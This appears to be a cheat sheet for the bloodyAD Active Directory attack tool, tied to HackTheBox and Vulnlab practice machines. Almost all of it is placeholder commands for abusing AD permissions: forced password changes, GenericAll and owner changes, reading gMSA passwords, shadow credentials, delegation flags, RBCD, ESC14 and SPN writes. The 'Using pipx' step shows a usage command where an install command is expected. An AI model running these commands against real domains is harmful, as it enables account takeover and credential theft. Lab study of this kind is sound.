Installation
Using uv
1
| uv tool install bloodyAD
|
Using pipx
1
| bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
|
Add User To Group
1
| bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
|
Change Password
1
| bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
|
Give User GenericAll Rights
1
| bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username
|
WriteOwner
1
| bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username
|
ReadGMSAPassword
1
| bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
|
Enable a Disabled Account
1
| bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE
|
Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag
1
| bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
|
Modify UPN
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn
|
Check if it has been modified
1
| bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr userPrincipalName
|
MachineAccountQuota
Enumerate MachineAccountQuota
1
| bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
|
Set MachineAccountQuota value to 10
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10
|
Modify mail
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local
|
Modify the altSecurityIdentities attribute (ESC14B)
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'
|
Find Writable Attributes
1
| bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
|
Shadow Credentials
1
| bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target
|
WriteSPN
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'
|
Find Deleted Objects
1
| bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del
|
Extended Search Operations
1
| bloodyAD --host $dc -d $domain -u $username -p $password get search -h
|
e.g.
1
| -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 to display tombstoned
|
1
| bloodyAD --host $dc -d $domain -u $username -p $password -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
|
Restore a deleted object
1
| bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore
|
Create a new computer account
1
| bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
|
Add Resource Based Constrained Delegation
1
| bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
|
Notes
- Pass
-k to use kerberos authentication
- You can pass a user hash instead of a password using
-p :hash
- Specify format for ‘–password’ or ‘-k ‘ using
-f, e.g. -f rc4
Resources
Machines To Practice
- Redelegate (Vulnlab)
- Vintage (HackTheBox)
- Infiltrator (HackTheBox)
- Rebound (HackTheBox)
- Absolute (HackTheBox)
- Certified (HackTheBox)
- TombWatcher (HackTheBox)
- Voleur (HackTheBox)
